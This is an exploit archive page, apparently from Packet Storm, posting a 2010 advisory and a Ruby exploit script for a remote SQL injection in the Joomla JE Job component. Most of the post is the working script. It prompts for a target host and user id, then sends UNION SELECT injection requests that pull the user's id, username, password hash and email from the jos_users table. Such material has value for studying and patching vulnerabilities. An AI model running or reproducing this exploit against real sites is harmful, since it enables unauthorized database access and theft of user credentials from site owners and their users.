exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla JE Job SQL Injection

Joomla JE Job SQL Injection
Posted Oct 1, 2010
Authored by Easy Laster

The Joomla JE Job component suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 58d4f989b51844e7cd18186dd98438d2455923831b90641f8ebc8541192f8200

Joomla JE Job SQL Injection

Change Mirror Download
----------------------------Information------------------------------------------------
+Name : joomla JE Job Component <= SQL injection Vulnerability Exploit
+Autor : Easy Laster
+Date : 30.09.2010
+Script : joomla JE Job Component
+Demo : http://joomlaextensions.co.in/jobcomponent/
+Download : http://joomlaextensions.co.in/extensions/modules/je-content-menu.html
?page=shop.product_details&category_id=4&flypage=flypage.tpl&product_id=59&vmcchk=1
+Price : free
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents and free-hack.com
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco,

---------------------------------------------------------------------------------------

___ ___ ___ ___ _ _ _____ _ _
| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_
|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|
|_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|
|___| |___|


----------------------------------------------------------------------------------------
#!/usr/bin/ruby
#4004-security-project.com
#Discovered and vulnerability by Easy Laster
print "
#########################################################
# 4004-Security-Project #
#########################################################
# joomla JE Job Component #
# Exploit #
# Using Host+Path+id #
# www.demo.de /forum/ 1 #
# Easy Laster #
#########################################################
"
require 'net/http'
print "#########################################################"
print "\nEnter host name (site.com)->"
host=gets.chomp
print "#########################################################"
print "\nEnter script path (/forum/)->"
path=gets.chomp
print "\n#########################################################"
print "\nEnter the id (id)->"
userid=gets.chomp
print "#########################################################"
begin
dir = "index.php?option=com_jejob&view=item_detail"+
"&itemid=1+and+1=0+uNiOn+sElEcT+1,concat(0x23,0x23,"+
"0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23),3,4,5,"+
"6,7,8,9,10,11,12,13+from+jos_users+where+id="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nid -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "index.php?option=com_jejob&view=item_detail&"+
"itemid=1+and+1=0+uNiOn+sElEcT+1,concat(0x23,0x23,0x23"+
",0x23,0x23,username,0x23,0x23,0x23,0x23,0x23),3,4,5,"+
"6,7,8,9,10,11,12,13+from+jos_users+where+id="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nUsername -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "index.php?option=com_jejob&view=item_detail&itemid"+
"=1+and+1=0+uNiOn+sElEcT+1,concat(0x23,0x23,0x23,0x23,0x23"+
",password,0x23,0x23,0x23,0x23,0x23),3,4,5,6,7,8,9,10,11,12"+
",13+from+jos_users+where+id="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nEPassword -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "index.php?option=com_jejob&view=item_detail&itemid=1+and+1=0"+
"+uNiOn+sElEcT+1,concat(0x23,0x23,0x23,0x23,0x23,email,0x23,0x23,0x23"+
",0x23,0x23),3,4,5,6,7,8,9,10,11,12,13+from+jos_users+where+id="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nEmail -> "+(/#####(.+)#####/).match(resp.body)[1]
print "\n#########################################################"
rescue
print "\nExploit failed"
end

Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close